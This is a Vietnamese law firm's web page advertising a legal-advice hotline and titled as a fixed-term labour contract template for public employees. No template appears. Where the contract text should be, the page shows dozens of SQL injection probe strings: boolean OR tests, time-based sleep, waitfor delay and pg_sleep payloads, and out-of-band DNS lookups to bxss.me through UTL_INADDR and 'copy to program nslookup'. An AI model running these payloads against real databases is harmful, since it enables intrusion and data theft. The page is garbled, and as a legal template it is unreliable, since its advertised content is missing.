Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu hợp đồng lao động có thời hạn cho viên chức

Cập nhật lần cuối lúc 14:36 ngày 18/08/2014

1
1
1
1
-1 OR 2+807-807-1=0+0+0+1 --
1'"
-1 OR 3+807-807-1=0+0+0+1 --
\
-1 OR 3*2<(0+5+807-807) --
1
-1 OR 3*2>(0+5+807-807) --
@@Jf1YO
JyI=
-1 OR 2+697-697-1=0+0+0+1
-1 OR 3+697-697-1=0+0+0+1
-1 OR 3*2<(0+5+697-697)
-1 OR 3*2>(0+5+697-697)
-1' OR 2+842-842-1=0+0+0+1 --
-1' OR 3+842-842-1=0+0+0+1 --
-1' OR 3*2<(0+5+842-842) --
-1' OR 3*2>(0+5+842-842) --
-1' OR 2+635-635-1=0+0+0+1 or 'nyEvQPoS'='
-1' OR 3+635-635-1=0+0+0+1 or 'nyEvQPoS'='
-1' OR 3*2<(0+5+635-635) or 'nyEvQPoS'='
-1' OR 3*2>(0+5+635-635) or 'nyEvQPoS'='
-1" OR 2+842-842-1=0+0+0+1 --
-1" OR 3+842-842-1=0+0+0+1 --
-1" OR 3*2<(0+5+842-842) --
-1" OR 3*2>(0+5+842-842) --
if(now()=sysdate(),sleep(11.532),0)/*'XOR(if(now()=sysdate(),sleep(11.532),0))OR'"XOR(if(now()=sysdate(),sleep(11.532),0))OR"*/
(select(0)from(select(sleep(3.844)))v)/*'+(select(0)from(select(sleep(3.844)))v)+'"+(select(0)from(select(sleep(3.844)))v)+"*/
-1; waitfor delay '0:0:3.844' --
-1); waitfor delay '0:0:7.688' --
1 waitfor delay '0:0:7.688' --
Hvcgl8zt'; waitfor delay '0:0:3.844' --
-1;select pg_sleep(7.688); --
-1);select pg_sleep(7.688); --
-1));select pg_sleep(11.532); --
OgkQtET2';select pg_sleep(11.532); --
ES7owg5v');select pg_sleep(11.532); --
k8o5YC52'));select pg_sleep(3.844); --
NkMLWOUw'));select pg_sleep(0); --
NuhlOAu8'));select pg_sleep(11.532); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5115.34060.ac6d4.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5117.34060.ac6d4.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5119.34060.ac6d4.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5120.34060.ac6d4.\1.bxss.me
71'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: